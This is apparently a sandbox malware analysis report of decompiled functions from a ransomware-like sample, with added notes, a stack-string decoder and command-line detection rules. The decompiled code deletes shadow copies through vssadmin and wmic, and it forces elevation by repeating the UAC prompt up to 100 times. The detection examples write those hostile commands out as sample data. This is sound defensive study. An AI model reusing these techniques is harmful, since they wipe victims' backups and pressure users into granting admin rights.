                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 35%
                                        			E0F9D2F50(WCHAR* __ecx) {
                                        				unsigned int _v8;
                                        				char _v12;
                                        				WCHAR* _v16;
                                        				short _v2064;
                                        				long _t17;
                                        				void* _t18;
                                        				WCHAR* _t23;
                                        				unsigned int _t31;
                                        				void* _t35;
                                        				intOrPtr* _t39;
                                        				signed int _t40;
                                        
                                        				_t39 = __imp__EnumDeviceDrivers;
                                        				_v16 = __ecx;
                                        				_v8 = 0;
                                        				 *_t39( &_v12, 4,  &_v8);
                                        				_t17 = _v8;
                                        				if(_t17 != 0) {
                                        					_t18 = VirtualAlloc(0, _t17, 0x3000, 4);
                                        					_t35 = _t18;
                                        					if(_t35 != 0) {
                                        						_push( &_v12);
                                        						_push(_v8);
                                        						_push(_t35);
                                        						if( *_t39() == 0) {
                                        							L10:
                                        							VirtualFree(_t35, 0, 0x8000);
                                        							return 0;
                                        						} else {
                                        							_t40 = 0;
                                        							_t31 = _v8 >> 2;
                                        							if(_t31 <= 0) {
                                        								goto L10;
                                        							} else {
                                        								while(1) {
                                        									_t23 =  &_v2064;
                                        									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400);
                                        									if(_t23 != 0 && lstrcmpiW( &_v2064, _v16) == 0) {
                                        										break;
                                        									}
                                        									_t40 = _t40 + 1;
                                        									if(_t40 < _t31) {
                                        										continue;
                                        									} else {
                                        										goto L10;
                                        									}
                                        									goto L12;
                                        								}
                                        								VirtualFree(_t35, 0, 0x8000);
                                        								return 1;
                                        							}
                                        						}
                                        					} else {
                                        						return _t18;
                                        					}
                                        				} else {
                                        					return _t17;
                                        				}
                                        				L12:
                                        			}

                                        APIs
                                        • EnumDeviceDrivers.PSAPI(?,00000004,?), ref: 0F9D2F74
                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F9D2F8D
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocDeviceDriversEnumVirtual
                                        • String ID:
                                        • API String ID: 4140748134-0
                                        • Opcode ID: 750eeed36a9270dc3ab65c9c99cab56b1db04c9c59c0ca0919d7f30fd2ca12f0
                                        • Instruction ID: 4c7de329cb28a127589ff01d55f5ce91161f909f0c02abca8b437967b4d48f0d
                                        • Opcode Fuzzy Hash: 750eeed36a9270dc3ab65c9c99cab56b1db04c9c59c0ca0919d7f30fd2ca12f0
                                        • Instruction Fuzzy Hash: 73212932A04219BBEB208F9CDD81FEDB7BCEB44711F2041A6FE04D6181D774A9259BA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Basic blocks: 225 f9d7ce0-f9d7ecb (InternetOpenW); 226 f9d7ecd-f9d7edf (InternetOpenW); 227 f9d7ee2-f9d7ee8
                                        • Edges: 225->226, 225->227, 226->227
                                        C-Code - Quality: 100%
                                        			E0F9D7CE0(void* __ecx) {
                                        				short _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				intOrPtr _v32;
                                        				intOrPtr _v36;
                                        				intOrPtr _v40;
                                        				intOrPtr _v44;
                                        				intOrPtr _v48;
                                        				intOrPtr _v52;
                                        				intOrPtr _v56;
                                        				intOrPtr _v60;
                                        				intOrPtr _v64;
                                        				intOrPtr _v68;
                                        				intOrPtr _v72;
                                        				intOrPtr _v76;
                                        				intOrPtr _v80;
                                        				intOrPtr _v84;
                                        				intOrPtr _v88;
                                        				intOrPtr _v92;
                                        				intOrPtr _v96;
                                        				intOrPtr _v100;
                                        				intOrPtr _v104;
                                        				intOrPtr _v108;
                                        				intOrPtr _v112;
                                        				intOrPtr _v116;
                                        				intOrPtr _v120;
                                        				intOrPtr _v124;
                                        				intOrPtr _v128;
                                        				intOrPtr _v132;
                                        				intOrPtr _v136;
                                        				intOrPtr _v140;
                                        				intOrPtr _v144;
                                        				intOrPtr _v148;
                                        				intOrPtr _v152;
                                        				intOrPtr _v156;
                                        				intOrPtr _v160;
                                        				intOrPtr _v164;
                                        				intOrPtr _v168;
                                        				intOrPtr _v172;
                                        				intOrPtr _v176;
                                        				intOrPtr _v180;
                                        				intOrPtr _v184;
                                        				intOrPtr _v188;
                                        				intOrPtr _v192;
                                        				intOrPtr _v196;
                                        				intOrPtr _v200;
                                        				intOrPtr _v204;
                                        				intOrPtr _v208;
                                        				intOrPtr _v212;
                                        				intOrPtr _v216;
                                        				intOrPtr _v220;
                                        				short _v224;
                                        				WCHAR* _t62;
                                        				void* _t64;
                                        
                                        				// User-Agent assembled as a stack string: each DWORD store carries two UTF-16LE
                                        				// code units, low word first, so the string never exists contiguously in the file.
                                        				_v8 = 0;                 // NUL terminator, the slot right after _v12
                                        				_v224 = 0x6f004d;        // "Mo"
                                        				_v220 = 0x69007a;        // "zi"
                                        				_v216 = 0x6c006c;        // "ll"
                                        				_v212 = 0x2f0061;        // "a/"
                                        				_v208 = 0x2e0035;        // "5."
                                        				_v204 = 0x200030;        // "0 "
                                        				_v200 = 0x570028;        // "(W"
                                        				_v196 = 0x6e0069;        // "in"
                                        				_v192 = 0x6f0064;        // "do"
                                        				_v188 = 0x730077;        // "ws"
                                        				_v184 = 0x4e0020;        // " N"
                                        				_v180 = 0x200054;        // "T "
                                        				_v176 = 0x2e0036;        // "6."
                                        				_v172 = 0x3b0031;        // "1;"
                                        				_v168 = 0x570020;        // " W"
                                        				_v164 = 0x57004f;        // "OW"
                                        				_v160 = 0x340036;        // "64"
                                        				_v156 = 0x200029;        // ") "
                                        				_v152 = 0x700041;        // "Ap"
                                        				_v148 = 0x6c0070;        // "pl"
                                        				_v144 = 0x570065;        // "eW"
                                        				_v140 = 0x620065;        // "eb"
                                        				_v136 = 0x69004b;        // "Ki"
                                        				_v132 = 0x2f0074;        // "t/"
                                        				_v128 = 0x330035;        // "53"
                                        				_v124 = 0x2e0037;        // "7."
                                        				_v120 = 0x360033;        // "36"
                                        				_v116 = 0x280020;        // " ("
                                        				_v112 = 0x48004b;        // "KH"
                                        				_v108 = 0x4d0054;        // "TM"
                                        				_v104 = 0x2c004c;        // "L,"
                                        				_v100 = 0x6c0020;        // " l"
                                        				_v96 = 0x6b0069;         // "ik"
                                        				_v92 = 0x200065;         // "e "
                                        				_v88 = 0x650047;         // "Ge"
                                        				_v84 = 0x6b0063;         // "ck"
                                        				_v80 = 0x29006f;         // "o)"
                                        				_v76 = 0x430020;         // " C"
                                        				_v72 = 0x720068;         // "hr"
                                        				_v68 = 0x6d006f;         // "om"
                                        				_v64 = 0x2f0065;         // "e/"
                                        				_v60 = 0x350035;         // "55"
                                        				_v56 = 0x30002e;         // ".0"
                                        				_v52 = 0x32002e;         // ".2"
                                        				_v48 = 0x380038;         // "88"
                                        				_v44 = 0x2e0033;         // "3."
                                        				_v40 = 0x370038;         // "87"
                                        				_v36 = 0x530020;         // " S"
                                        				_v32 = 0x660061;         // "af"
                                        				_v28 = 0x720061;         // "ar"
                                        				_v24 = 0x2f0069;         // "i/"
                                        				_v20 = 0x330035;         // "53"
                                        				_v16 = 0x2e0037;         // "7."
                                        				_v12 = 0x360033;         // "36"
                                        				// => L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
                                        				// InternetOpenW(lpszAgent, INTERNET_OPEN_TYPE_PRECONFIG (0), NULL, NULL, dwFlags 0);
                                        				// the WinINet session handle is stored at offset 4 of the object passed in ECX.
                                        				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0);
                                        				 *(__ecx + 4) = _t62;
                                        				if(_t62 == 0) {
                                        					// Fallback when the preconfigured (proxy-aware) open fails: INTERNET_OPEN_TYPE_DIRECT (1),
                                        					// no proxy (the two NULLs are the failed handle, i.e. 0), INTERNET_FLAG_ASYNC (0x10000000).
                                        					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
                                        					 *(__ecx + 4) = _t64;
                                        					return _t64;
                                        				}
                                        				return _t62;
                                        			}
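The User-Agent above is written two UTF-16LE code units at a time into adjacent stack slots, so neither a strings pass over the file nor a plain Yara string rule sees it. The decoder below is an added example, not part of the Joe Sandbox output: it rebuilds such strings from the decompiler's `_vN = 0x...;` stores by ordering the slots by offset (a larger `_vN` is a lower address, hence earlier in the string), emitting the low word then the high word of each store, and splitting on NUL code units or on gaps in the slot sequence. The embedded sample is the wmic branch of E0F9D43E0 further down this report; the function and constant names are the example's own.

```python
import re
from typing import Dict, List

# Matches decompiler stack-slot stores such as "_v224 = 0x6f004d;" or "_v8 = 0;".
# Stores from registers ("_v176 = _t51;") and address-of uses ("&_v152;") do not match.
SLOT_STORE = re.compile(r"_v(\d+)\s*=\s*(0x[0-9A-Fa-f]+|\d+)\s*;")


def decode_stack_strings(segment: str) -> List[str]:
    """Rebuild the UTF-16LE strings a function assembles on its stack.

    _vN is the slot at frame-N, so a larger N is a lower address and comes
    earlier in the string. Each 32-bit store carries two code units, low word
    first (little-endian). A NUL code unit, or a slot that is not 4 bytes below
    the previous one, ends one string and starts the next. Feed one group of
    stores per call: when a slot is stored twice (slot reuse, as with the
    "runas" verb in E0F9D3BE0), the later store wins here.
    """
    slots: Dict[int, int] = {}
    for m in SLOT_STORE.finditer(segment):
        slots[int(m.group(1))] = int(m.group(2), 0)

    strings: List[str] = []
    current: List[str] = []

    def flush() -> None:
        if current:
            strings.append("".join(current))
            current.clear()

    prev = None
    for off in sorted(slots, reverse=True):
        if prev is not None and off != prev - 4:
            flush()                      # non-adjacent slot: a different string
        prev = off
        val = slots[off]
        for unit in (val & 0xFFFF, (val >> 16) & 0xFFFF):
            if unit == 0:
                flush()                  # NUL terminator
            else:
                current.append(chr(unit))
    flush()
    return strings


# Stores copied from the else-branch of E0F9D43E0 in this report (the wmic path).
# The two register assignments in between are ignored by the pattern.
WMIC_BRANCH = """
    _v152 = 0x77005c;
    _v148 = 0x650062;
    _t59 =  &_v152;
    _v144 = 0x5c006d;
    _t51 =  &_v120;
    _v140 = 0x6d0077;
    _v136 = 0x630069;
    _v132 = 0x65002e;
    _v128 = 0x650078;
    _v124 = 0;
    _v120 = 0x680073;
    _v116 = 0x640061;
    _v112 = 0x77006f;
    _v108 = 0x6f0063;
    _v104 = 0x790070;
    _v100 = 0x640020;
    _v96 = 0x6c0065;
    _v92 = 0x740065;
    _v88 = 0x65;
"""

if __name__ == "__main__":
    for s in decode_stack_strings(WMIC_BRANCH):
        print(repr(s))
```

Paste any of the three functions' store runs from this report into `decode_stack_strings` to recover the tool path and argument string it launches; the order of the stores in the decompiled text does not matter, only the slot offsets do.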

                                        APIs
                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F9D7EC4
                                        • InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F9D7EDD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InternetOpen
                                        • String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
                                        • API String ID: 2038078732-2805935662
                                        • Opcode ID: 6aa26727da79f6f5d82752cbb9012afbb8eaa4e3a6815437072f4eb8faad332b
                                        • Instruction ID: 2e06515f8ee9b72de9484f46fa45d8b61185205893f60446f9b794fd3d471f0b
                                        • Opcode Fuzzy Hash: 6aa26727da79f6f5d82752cbb9012afbb8eaa4e3a6815437072f4eb8faad332b
                                        • Instruction Fuzzy Hash: 7E41A8B4811358DEEB21CF919998B9EBFF5BB04748F50819ED5086B201C7F60A89CF64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 97%
                                        			E0F9D43E0(void* __eflags) {
                                        				short _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				intOrPtr _v32;
                                        				intOrPtr _v36;
                                        				intOrPtr _v40;
                                        				intOrPtr _v44;
                                        				intOrPtr _v48;
                                        				intOrPtr _v52;
                                        				intOrPtr _v56;
                                        				intOrPtr _v60;
                                        				intOrPtr _v64;
                                        				intOrPtr _v68;
                                        				intOrPtr _v72;
                                        				intOrPtr _v76;
                                        				intOrPtr _v80;
                                        				char _v84;
                                        				intOrPtr _v88;
                                        				intOrPtr _v92;
                                        				intOrPtr _v96;
                                        				intOrPtr _v100;
                                        				intOrPtr _v104;
                                        				intOrPtr _v108;
                                        				intOrPtr _v112;
                                        				intOrPtr _v116;
                                        				char _v120;
                                        				short _v124;
                                        				intOrPtr _v128;
                                        				intOrPtr _v132;
                                        				intOrPtr _v136;
                                        				intOrPtr _v140;
                                        				intOrPtr _v144;
                                        				intOrPtr _v148;
                                        				char _v152;
                                        				short _v156;
                                        				intOrPtr _v160;
                                        				intOrPtr _v164;
                                        				intOrPtr _v168;
                                        				char _v172;
                                        				short* _v176;
                                        				short* _t51;
                                        				WCHAR* _t59;
                                        				void* _t62;
                                        				signed int _t66;
                                        				void* _t69;
                                        
                                        				// Shadow-copy deletion. E0F9D3B20 is the OS version check (VerifyVersionInfoW, see
                                        				// the APIs list); its result selects one of two tool/argument pairs. Both pairs are
                                        				// UTF-16LE stack strings: two code units per DWORD store, low word first.
                                        				if(E0F9D3B20(_t62) == 0) {
                                        					_v172 = 0x63005c;    // "\c"   -> _t59 = L"\\cmd.exe"
                                        					_v168 = 0x64006d;    // "md"
                                        					_v8 = 0;             // NUL terminator of the argument string (slot after _v12)
                                        					_t59 =  &_v172;
                                        					_v164 = 0x65002e;    // ".e"
                                        					_t51 =  &_v84;
                                        					_v160 = 0x650078;    // "xe"
                                        					_v156 = 0;           // NUL terminator of L"\\cmd.exe"
                                        					_v84 = 0x63002f;     // "/c"   -> _t51 = L"/c vssadmin delete shadows /all /quiet"
                                        					_v80 = 0x760020;     // " v"
                                        					_v76 = 0x730073;     // "ss"
                                        					_v72 = 0x640061;     // "ad"
                                        					_v68 = 0x69006d;     // "mi"
                                        					_v64 = 0x20006e;     // "n "
                                        					_v60 = 0x650064;     // "de"
                                        					_v56 = 0x65006c;     // "le"
                                        					_v52 = 0x650074;     // "te"
                                        					_v48 = 0x730020;     // " s"
                                        					_v44 = 0x610068;     // "ha"
                                        					_v40 = 0x6f0064;     // "do"
                                        					_v36 = 0x730077;     // "ws"
                                        					_v32 = 0x2f0020;     // " /"
                                        					_v28 = 0x6c0061;     // "al"
                                        					_v24 = 0x20006c;     // "l "
                                        					_v20 = 0x71002f;     // "/q"
                                        					_v16 = 0x690075;     // "ui"
                                        					_v12 = 0x740065;     // "et"
                                        				} else {
                                        					_v152 = 0x77005c;    // "\w"   -> _t59 = L"\\wbem\\wmic.exe"
                                        					_v148 = 0x650062;    // "be"
                                        					_t59 =  &_v152;
                                        					_v144 = 0x5c006d;    // "m\"
                                        					_t51 =  &_v120;
                                        					_v140 = 0x6d0077;    // "wm"
                                        					_v136 = 0x630069;    // "ic"
                                        					_v132 = 0x65002e;    // ".e"
                                        					_v128 = 0x650078;    // "xe"
                                        					_v124 = 0;           // NUL terminator of L"\\wbem\\wmic.exe"
                                        					_v120 = 0x680073;    // "sh"   -> _t51 = L"shadowcopy delete"
                                        					_v116 = 0x640061;    // "ad"
                                        					_v112 = 0x77006f;    // "ow"
                                        					_v108 = 0x6f0063;    // "co"
                                        					_v104 = 0x790070;    // "py"
                                        					_v100 = 0x640020;    // " d"
                                        					_v96 = 0x6c0065;     // "el"
                                        					_v92 = 0x740065;     // "et"
                                        					_v88 = 0x65;         // "e" followed by NUL
                                        				}
                                        				_v176 = _t51;
                                        				// 0x400-byte path buffer: MEM_COMMIT|MEM_RESERVE (0x3000), PAGE_EXECUTE_READWRITE (0x40).
                                        				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
                                        				if(_t69 != 0) {
                                        					GetSystemDirectoryW(_t69, 0x100);               // e.g. C:\Windows\system32 (0x100 WCHARs)
                                        					lstrcatW(_t69, _t59);                           // + L"\\cmd.exe" or L"\\wbem\\wmic.exe"
                                        					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);   // nShowCmd 0 = SW_HIDE
                                        					// Decompiler residue: the original compares the returned HINSTANCE with 0x20
                                        					// (ShellExecuteW signals failure with values <= 32) and derives a flag from it.
                                        					asm("sbb edi, edi");
                                        					_t66 =  ~0x20;
                                        				} else {
                                        					_t66 = 0;
                                        				}
                                        				VirtualFree(_t69, 0, 0x8000);                       // MEM_RELEASE
                                        				return _t66;
                                        			}

                                        APIs
                                          • Part of subcall function 0F9D3B20: _memset.LIBCMT ref: 0F9D3B72
                                          • Part of subcall function 0F9D3B20: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F9D3B96
                                          • Part of subcall function 0F9D3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F9D3B9A
                                          • Part of subcall function 0F9D3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F9D3B9E
                                          • Part of subcall function 0F9D3B20: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F9D3BC5
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 0F9D459F
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 0F9D45B5
                                        • lstrcatW.KERNEL32(00000000,0063005C), ref: 0F9D45BD
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 0F9D45D3
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D45E7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
                                        • String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
                                        • API String ID: 2684037697-4098772853
                                        • Opcode ID: 21fdc465e9e5f65918be6536aef2ec2d5b2fa9e5921b005dbfdf09191aef98d1
                                        • Instruction ID: 3d037ce479e92392a6ff62be71b1d1a21a9f280bc8e3ba4ad5c125b82955ba1c
                                        • Opcode Fuzzy Hash: 21fdc465e9e5f65918be6536aef2ec2d5b2fa9e5921b005dbfdf09191aef98d1
                                        • Instruction Fuzzy Hash: EE4128B0149380DEE3208F119849B5BBFE6BB81B49F10491CF6985A292C7F6858CCF97
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0F9D3BE0(void* __ecx, void* __edx, void* __eflags) {
                                        				char _v1020;
                                        				short _v1028;
                                        				char _v1532;
                                        				short _v1540;
                                        				intOrPtr _v1548;
                                        				intOrPtr _v1552;
                                        				intOrPtr _v1556;
                                        				intOrPtr _v1560;
                                        				intOrPtr _v1564;
                                        				intOrPtr _v1568;
                                        				intOrPtr _v1572;
                                        				intOrPtr _v1576;
                                        				intOrPtr _v1580;
                                        				intOrPtr _v1584;
                                        				intOrPtr _v1588;
                                        				intOrPtr _v1592;
                                        				intOrPtr _v1596;
                                        				intOrPtr _v1600;
                                        				intOrPtr _v1604;
                                        				intOrPtr _v1608;
                                        				intOrPtr _v1612;
                                        				intOrPtr _v1616;
                                        				short _v1620;
                                        				intOrPtr _v1624;
                                        				intOrPtr _v1628;
                                        				intOrPtr _v1632;
                                        				intOrPtr _v1636;
                                        				intOrPtr _v1640;
                                        				intOrPtr _v1644;
                                        				intOrPtr _v1648;
                                        				intOrPtr _v1652;
                                        				intOrPtr _v1656;
                                        				intOrPtr _v1660;
                                        				intOrPtr _v1664;
                                        				intOrPtr _v1668;
                                        				intOrPtr _v1672;
                                        				short _v1676;
                                        				char _v1680;
                                        				int _t54;
                                        				struct HWND__* _t62;
                                        				long _t66;
                                        				void* _t76;
                                        				void* _t78;
                                        				void* _t80;
                                        
                                        				// Elevation through a repeated UAC prompt. _t78 (ECX) is a caller-supplied path
                                        				// that is substituted for the "%s" in the command line built below.
                                        				_t78 = __ecx;
                                        				_t54 = E0F9D3B20(__edx);                   // OS version check (VerifyVersionInfoW)
                                        				if(_t54 != 0) {
                                        					// E0F9D3AA0 builds the BUILTIN\Administrators SID, S-1-5-32-544 (sub-authorities
                                        					// 0x20 and 0x220 in the AllocateAndInitializeSid call listed under APIs); the
                                        					// elevation path is taken only when it returns 0.
                                        					_t54 = E0F9D3AA0();
                                        					if(_t54 == 0) {
                                        						// UTF-16LE stack string, two code units per DWORD store, low word first:
                                        						_v1676 = 0x770025;   // "%w"
                                        						_v1672 = 0x6e0069;   // "in"
                                        						_v1668 = 0x690064;   // "di"
                                        						_v1664 = 0x250072;   // "r%"
                                        						_v1660 = 0x73005c;   // "\s"
                                        						_v1656 = 0x730079;   // "ys"
                                        						_v1652 = 0x650074;   // "te"
                                        						_v1648 = 0x33006d;   // "m3"
                                        						_v1644 = 0x5c0032;   // "2\"
                                        						_v1640 = 0x620077;   // "wb"
                                        						_v1636 = 0x6d0065;   // "em"
                                        						_v1632 = 0x77005c;   // "\w"
                                        						_v1628 = 0x69006d;   // "mi"
                                        						_v1624 = 0x63;       // "c" followed by NUL
                                        						// => L"%windir%\\system32\\wbem\\wmic", expanded into the _v1540 buffer (0xff WCHARs)
                                        						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
                                        						_v1620 = 0x720070;   // "pr"
                                        						_v1616 = 0x63006f;   // "oc"
                                        						_v1612 = 0x730065;   // "es"
                                        						_v1608 = 0x200073;   // "s "
                                        						_v1604 = 0x610063;   // "ca"
                                        						_v1600 = 0x6c006c;   // "ll"
                                        						_v1596 = 0x630020;   // " c"
                                        						_v1592 = 0x650072;   // "re"
                                        						_v1588 = 0x740061;   // "at"
                                        						_v1584 = 0x200065;   // "e "
                                        						_v1580 = 0x630022;   // "\"c"
                                        						_v1576 = 0x64006d;   // "md"
                                        						_v1572 = 0x2f0020;   // " /"
                                        						_v1568 = 0x200063;   // "c "
                                        						_v1564 = 0x740073;   // "st"
                                        						_v1560 = 0x720061;   // "ar"
                                        						_v1556 = 0x200074;   // "t "
                                        						_v1552 = 0x730025;   // "%s"
                                        						_v1548 = 0x22;       // "\"" followed by NUL
                                        						// => L"process call create \"cmd /c start %s\"", formatted with _t78 into the _v1028 buffer
                                        						wsprintfW( &_v1028,  &_v1620, _t78);
                                        						// SHELLEXECUTEINFOW (0x3c bytes on 32-bit) placed in RWX memory (0x3000, 0x40).
                                        						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
                                        						 *_t76 = 0x3c;                              // cbSize
                                        						 *(_t76 + 4) = 0x40;                        // fMask = SEE_MASK_NOCLOSEPROCESS (keeps hProcess)
                                        						_t62 = GetForegroundWindow();
                                        						_t80 = 0;                                   // retry counter
                                        						 *(_t76 + 8) = _t62;                        // hwnd
                                        						_v1680 = 0x750072;                          // "ru"  (reuses the slots of the already-expanded %windir% string)
                                        						_v1676 = 0x61006e;                          // "na"
                                        						_v1672 = 0x73;                              // "s" followed by NUL  => L"runas"
                                        						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;     // lpVerb = L"runas": raises the UAC consent prompt
                                        						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;    // lpFile: the expanded wmic path (likely the same buffer as
                                        						                                            // _v1540 above; the _v names shift by the 8 bytes pushed for the call)
                                        						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;    // lpParameters: process call create "cmd /c start <path>" (likewise _v1028)
                                        						 *(_t76 + 0x18) = 0;                        // lpDirectory
                                        						 *(_t76 + 0x1c) = 0;                        // nShow = SW_HIDE
                                        						 *(_t76 + 0x20) = 0;                        // hInstApp
                                        						// Re-issue the prompt until the user accepts it, at most 100 (0x64) times.
                                        						while(1) {
                                        							_t66 = ShellExecuteExW(_t76);
                                        							if(_t66 != 0) {
                                        								break;
                                        							}
                                        							_t80 = _t80 + 1;
                                        							if(_t80 < 0x64) {
                                        								continue;
                                        							}
                                        							_t54 = VirtualFree(_t76, _t66, 0x8000);   // gave up after 100 refusals; MEM_RELEASE
                                        							goto L6;
                                        						}
                                        						// Elevated child is running: wait on its hProcess (offset 0x38), then terminate
                                        						// this unelevated instance.
                                        						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
                                        						CloseHandle( *(_t76 + 0x38));
                                        						ExitProcess(0);
                                        					}
                                        				}
                                        				L6:
                                        				return _t54;
                                        			}
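Both E0F9D43E0 (shadow-copy deletion through vssadmin or wmic) and E0F9D3BE0 (wmic `process call create` launched under the `runas` verb) end as ordinary process creations, so their command lines are visible in Sysmon Event ID 1 or Security 4688 records. The rules below are an added detection example, not part of the report: the event records are constructed here in a simplified Sysmon-like shape, the user-profile path is an assumption, and the rule names are the example's own. Matching normalises case and whitespace, because `VSSADMIN  Delete Shadows` is the same command as the one decompiled above.

```python
import re
from typing import Dict, List, Tuple

# Command-line patterns for the three behaviours decompiled in this report. They run on a
# lower-cased, whitespace-collapsed command line; the optional ".exe" and the leading \b let
# "C:\Windows\system32\wbem\wmic.exe" and a bare "wmic" both match.
RULES: Dict[str, "re.Pattern[str]"] = {
    "vssadmin_delete_shadows":  re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\b.*\bshadows\b"),
    "wmic_shadowcopy_delete":   re.compile(r"\bwmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b"),
    "wmic_process_call_create": re.compile(r"\bwmic(?:\.exe)?\b.*\bprocess\s+call\s+create\b"),
}


def normalize(cmdline: str) -> str:
    """Lower-case and collapse whitespace so padding or casing cannot dodge a rule."""
    return re.sub(r"\s+", " ", cmdline).strip().lower()


def match_rules(event: Dict[str, str]) -> List[str]:
    """Names of every rule whose pattern matches the event's command line."""
    cmd = normalize(event.get("CommandLine", ""))
    return [name for name, pat in RULES.items() if pat.search(cmd)]


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, str, str]]:
    """Run all rules over all events; one (event index, rule, parent image) per hit.

    The parent image is kept because in this sample the vssadmin call is wrapped in
    cmd.exe, so the interesting parent is the dropper, not cmd.exe.
    """
    hits: List[Tuple[int, str, str]] = []
    for i, ev in enumerate(events):
        for name in match_rules(ev):
            hits.append((i, name, ev.get("ParentImage", "")))
    return hits


# Constructed process-creation records (Sysmon Event ID 1 fields, simplified). The sample
# name is the one from this report; the Desktop path is an assumption.
PARENT = r"C:\Users\user\Desktop\gI5xZdIxUs.exe"
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Windows\system32\cmd.exe /c vssadmin delete shadows /all /quiet",
     "ParentImage": PARENT},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"C:\Windows\system32\wbem\wmic.exe shadowcopy delete",
     "ParentImage": PARENT},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'C:\Windows\system32\wbem\wmic process call create "cmd /c start ' + PARENT + '"',
     "ParentImage": PARENT},
    {"Image": r"C:\Windows\System32\cmd.exe",           # benign: must not fire
     "CommandLine": r"cmd.exe /c dir C:\Users\user",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",           # casing/padding variant: must still fire
     "CommandLine": r"cmd  /C   VSSADMIN Delete  Shadows /All /Quiet",
     "ParentImage": PARENT},
]

if __name__ == "__main__":
    for idx, rule, parent in scan(SAMPLE_EVENTS):
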